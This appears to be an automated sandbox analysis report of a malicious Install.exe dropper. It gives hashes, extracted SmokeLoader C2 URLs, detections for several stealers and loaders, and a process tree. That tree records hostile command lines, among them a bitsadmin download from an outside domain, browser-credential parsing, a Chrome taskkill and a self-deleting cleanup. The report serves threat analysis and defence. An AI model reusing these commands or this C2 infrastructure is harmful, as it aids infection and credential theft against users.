Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    601s
  • max time network
    584s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    26-04-2021 20:09

General

  • Target

    Install.exe

  • Size

    497KB

  • MD5

    41a5f4fd1ea7cac4aa94a87aebccfef0

  • SHA1

    0d0abf079413a4c773754bf4fda338dc5b9a8ddc

  • SHA256

    97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

  • SHA512

    5ca14bda498f26efff4e1179969b8f2c25244063c7bf25f3ec20b5cd24b5be320bbfb8b3d0b2d66f5c5b415da777a766fece5f251a4247773c6cb991417fb75f

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 32 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 42 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
    1⤵
      PID:1248
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2324
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2632
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2624
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2616
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2364
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1848
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1404
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1204
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1096
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1044
                    • C:\Users\Admin\AppData\Roaming\ssdjcsg
                      C:\Users\Admin\AppData\Roaming\ssdjcsg
                      2⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:5584
                    • C:\Users\Admin\AppData\Roaming\tcdjcsg
                      C:\Users\Admin\AppData\Roaming\tcdjcsg
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:2752
                      • C:\Users\Admin\AppData\Roaming\tcdjcsg
                        C:\Users\Admin\AppData\Roaming\tcdjcsg
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5824
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:64
                    • C:\Users\Admin\AppData\Local\Temp\Install.exe
                      "C:\Users\Admin\AppData\Local\Temp\Install.exe"
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:640
                      • C:\Users\Admin\AppData\Local\Temp\is-8R4KJ.tmp\Install.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-8R4KJ.tmp\Install.tmp" /SL5="$90030,235791,152064,C:\Users\Admin\AppData\Local\Temp\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:4020
                        • C:\Users\Admin\AppData\Local\Temp\is-AB3L9.tmp\Ultra.exe
                          "C:\Users\Admin\AppData\Local\Temp\is-AB3L9.tmp\Ultra.exe" /S /UID=burnerch1
                          3⤵
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Adds Run key to start application
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3488
                          • C:\Program Files\Windows Sidebar\ELNEMORLIY\ultramediaburner.exe
                            "C:\Program Files\Windows Sidebar\ELNEMORLIY\ultramediaburner.exe" /VERYSILENT
                            4⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:1332
                            • C:\Users\Admin\AppData\Local\Temp\is-O8F2L.tmp\ultramediaburner.tmp
                              "C:\Users\Admin\AppData\Local\Temp\is-O8F2L.tmp\ultramediaburner.tmp" /SL5="$8004C,281924,62464,C:\Program Files\Windows Sidebar\ELNEMORLIY\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Drops file in Program Files directory
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of FindShellTrayWindow
                              • Suspicious use of WriteProcessMemory
                              PID:1336
                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                6⤵
                                • Executes dropped EXE
                                PID:3880
                          • C:\Users\Admin\AppData\Local\Temp\9f-dc679-5e4-6d09c-29a9aa66b58df\Peruqalaetu.exe
                            "C:\Users\Admin\AppData\Local\Temp\9f-dc679-5e4-6d09c-29a9aa66b58df\Peruqalaetu.exe"
                            4⤵
                            • Executes dropped EXE
                            • Checks computer location settings
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4060
                          • C:\Users\Admin\AppData\Local\Temp\e3-b659c-f4b-7b5ba-4f98d4f62d816\Bezhyvecohi.exe
                            "C:\Users\Admin\AppData\Local\Temp\e3-b659c-f4b-7b5ba-4f98d4f62d816\Bezhyvecohi.exe"
                            4⤵
                            • Executes dropped EXE
                            • Modifies system certificate store
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:3924
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zkscintk.k0b\instEU.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4176
                              • C:\Users\Admin\AppData\Local\Temp\zkscintk.k0b\instEU.exe
                                C:\Users\Admin\AppData\Local\Temp\zkscintk.k0b\instEU.exe
                                6⤵
                                • Executes dropped EXE
                                PID:4436
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qlb3ccmx.x2s\requête.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1504
                              • C:\Users\Admin\AppData\Local\Temp\qlb3ccmx.x2s\requête.exe
                                C:\Users\Admin\AppData\Local\Temp\qlb3ccmx.x2s\requête.exe
                                6⤵
                                • Executes dropped EXE
                                • Suspicious use of WriteProcessMemory
                                PID:4208
                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe
                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"
                                  7⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  PID:4584
                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                    parse.exe -f json -b firefox
                                    8⤵
                                    • Executes dropped EXE
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    PID:4868
                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                    parse.exe -f json -b chrome
                                    8⤵
                                    • Executes dropped EXE
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    PID:4460
                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
                                    parse.exe -f json -b edge
                                    8⤵
                                    • Executes dropped EXE
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    PID:4920
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5ed0we0d.nqz\google-game.exe & exit
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:4808
                              • C:\Users\Admin\AppData\Local\Temp\5ed0we0d.nqz\google-game.exe
                                C:\Users\Admin\AppData\Local\Temp\5ed0we0d.nqz\google-game.exe
                                6⤵
                                  PID:5012
                                  • C:\Windows\SysWOW64\rundll32.exe
                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                    7⤵
                                    • Loads dropped DLL
                                    • Modifies registry class
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of WriteProcessMemory
                                    PID:4160
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\50ssss25.psc\md1_1eaf.exe & exit
                                5⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4880
                                • C:\Users\Admin\AppData\Local\Temp\50ssss25.psc\md1_1eaf.exe
                                  C:\Users\Admin\AppData\Local\Temp\50ssss25.psc\md1_1eaf.exe
                                  6⤵
                                  • Executes dropped EXE
                                  • Checks whether UAC is enabled
                                  PID:412
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\peeeykvb.gel\askinstall39.exe & exit
                                5⤵
                                • Suspicious use of WriteProcessMemory
                                PID:5104
                                • C:\Users\Admin\AppData\Local\Temp\peeeykvb.gel\askinstall39.exe
                                  C:\Users\Admin\AppData\Local\Temp\peeeykvb.gel\askinstall39.exe
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4420
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c taskkill /f /im chrome.exe
                                    7⤵
                                      PID:6012
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /f /im chrome.exe
                                        8⤵
                                        • Kills process with taskkill
                                        PID:4484
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nt2fxcov.0jz\SunLabsPlayer.exe /S & exit
                                  5⤵
                                    PID:1624
                                    • C:\Users\Admin\AppData\Local\Temp\nt2fxcov.0jz\SunLabsPlayer.exe
                                      C:\Users\Admin\AppData\Local\Temp\nt2fxcov.0jz\SunLabsPlayer.exe /S
                                      6⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Drops file in Program Files directory
                                      PID:5836
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6729.tmp\tempfile.ps1"
                                        7⤵
                                          PID:5520
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6729.tmp\tempfile.ps1"
                                          7⤵
                                            PID:5576
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6729.tmp\tempfile.ps1"
                                            7⤵
                                              PID:5208
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6729.tmp\tempfile.ps1"
                                              7⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:4224
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6729.tmp\tempfile.ps1"
                                              7⤵
                                                PID:4552
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6729.tmp\tempfile.ps1"
                                                7⤵
                                                  PID:4792
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6729.tmp\tempfile.ps1"
                                                  7⤵
                                                  • Checks for any installed AV software in registry
                                                  PID:6004
                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                  "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                  7⤵
                                                  • Download via BitsAdmin
                                                  PID:4208
                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pgOoJ99SYVwji1SL -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                  7⤵
                                                  • Executes dropped EXE
                                                  • Drops file in Program Files directory
                                                  PID:5148
                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pWg3lyghplhRrDY2 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:5928
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6729.tmp\tempfile.ps1"
                                                  7⤵
                                                    PID:5716
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6729.tmp\tempfile.ps1"
                                                    7⤵
                                                      PID:4020
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6729.tmp\tempfile.ps1"
                                                      7⤵
                                                        PID:5428
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6729.tmp\tempfile.ps1"
                                                        7⤵
                                                          PID:1008
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6729.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:5572
                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                            C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ADYtLcfIGYtW\ADYtLcfIGYtW.dll" ADYtLcfIGYtW
                                                            7⤵
                                                            • Loads dropped DLL
                                                            PID:5644
                                                            • C:\Windows\system32\rundll32.exe
                                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\ADYtLcfIGYtW\ADYtLcfIGYtW.dll" ADYtLcfIGYtW
                                                              8⤵
                                                              • Loads dropped DLL
                                                              • Drops file in System32 directory
                                                              PID:2708
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6729.tmp\tempfile.ps1"
                                                            7⤵
                                                            • Drops file in Program Files directory
                                                            PID:4492
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6729.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:5796
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6729.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:4416
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6729.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:5556
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6729.tmp\tempfile.ps1"
                                                                  7⤵
                                                                    PID:1548
                                                                  • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                    "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                    7⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • Drops file in Program Files directory
                                                                    PID:5784
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vdvmax3n.fqv\inst.exe & exit
                                                                5⤵
                                                                  PID:5248
                                                                  • C:\Users\Admin\AppData\Local\Temp\vdvmax3n.fqv\inst.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\vdvmax3n.fqv\inst.exe
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    PID:4172
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rs1mypsx.cdi\GcleanerWW.exe /mixone & exit
                                                                  5⤵
                                                                    PID:6140
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j33ckhxi.rhq\toolspab1.exe & exit
                                                                    5⤵
                                                                      PID:1784
                                                                      • C:\Users\Admin\AppData\Local\Temp\j33ckhxi.rhq\toolspab1.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\j33ckhxi.rhq\toolspab1.exe
                                                                        6⤵
                                                                          PID:4224
                                                                          • C:\Users\Admin\AppData\Local\Temp\j33ckhxi.rhq\toolspab1.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\j33ckhxi.rhq\toolspab1.exe
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Checks SCSI registry key(s)
                                                                            • Suspicious behavior: MapViewOfSection
                                                                            PID:4812
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ntcgk1ux.kvp\app.exe /8-2222 & exit
                                                                        5⤵
                                                                          PID:5592
                                                                          • C:\Users\Admin\AppData\Local\Temp\ntcgk1ux.kvp\app.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\ntcgk1ux.kvp\app.exe /8-2222
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            PID:6020
                                                                            • C:\Users\Admin\AppData\Local\Temp\ntcgk1ux.kvp\app.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\ntcgk1ux.kvp\app.exe" /8-2222
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              • Modifies data under HKEY_USERS
                                                                              PID:5928
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fxnaso2j.qad\c7ae36fa.exe & exit
                                                                          5⤵
                                                                            PID:6084
                                                                            • C:\Users\Admin\AppData\Local\Temp\fxnaso2j.qad\c7ae36fa.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\fxnaso2j.qad\c7ae36fa.exe
                                                                              6⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Checks SCSI registry key(s)
                                                                              • Suspicious behavior: MapViewOfSection
                                                                              PID:5800
                                                                  • \??\c:\windows\system32\svchost.exe
                                                                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                    1⤵
                                                                    • Suspicious use of SetThreadContext
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:1264
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                      2⤵
                                                                      • Drops file in System32 directory
                                                                      • Checks processor information in registry
                                                                      • Modifies data under HKEY_USERS
                                                                      • Modifies registry class
                                                                      PID:4712
                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                    1⤵
                                                                    • Drops file in Windows directory
                                                                    • Modifies Internet Explorer settings
                                                                    • Modifies registry class
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    PID:2004
                                                                  • C:\Windows\system32\browser_broker.exe
                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                    1⤵
                                                                    • Modifies Internet Explorer settings
                                                                    PID:4200
                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                    1⤵
                                                                    • Suspicious behavior: MapViewOfSection
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:5044
                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                    1⤵
                                                                    • Modifies Internet Explorer settings
                                                                    • Modifies registry class
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:4384
                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                    1⤵
                                                                    • Modifies registry class
                                                                    PID:5896
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k wsappx -s AppXSvc
                                                                    1⤵
                                                                    • Executes dropped EXE
                                                                    • Drops file in Program Files directory
                                                                    • Suspicious use of SetWindowsHookEx
                                                                    • Suspicious use of WriteProcessMemory
                                                                    PID:5012
                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                    1⤵
                                                                    • Modifies registry class
                                                                    PID:3860
                                                                  • C:\Windows\system32\werfault.exe
                                                                    werfault.exe /h /shared Global\49bfa903631743c195a394c83bcfaa2a /t 5832 /p 3860
                                                                    1⤵
                                                                      PID:5700
                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                      1⤵
                                                                      • Modifies registry class
                                                                      PID:4516
                                                                    • \??\c:\windows\system32\svchost.exe
                                                                      c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                      1⤵
                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                      PID:2604
                                                                    • C:\Users\Admin\AppData\Local\Temp\6453.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\6453.exe
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      PID:5408
                                                                    • C:\Users\Admin\AppData\Local\Temp\66A6.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\66A6.exe
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      PID:5964
                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                      1⤵
                                                                        PID:3300
                                                                      • C:\Windows\explorer.exe
                                                                        C:\Windows\explorer.exe
                                                                        1⤵
                                                                          PID:1236
                                                                        • C:\Users\Admin\AppData\Local\Temp\6E68.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\6E68.exe
                                                                          1⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          PID:2812
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\6E68.exe"
                                                                            2⤵
                                                                              PID:4588
                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                timeout /T 10 /NOBREAK
                                                                                3⤵
                                                                                • Delays execution with timeout.exe
                                                                                PID:200
                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                            1⤵
                                                                              PID:1816
                                                                            • C:\Windows\explorer.exe
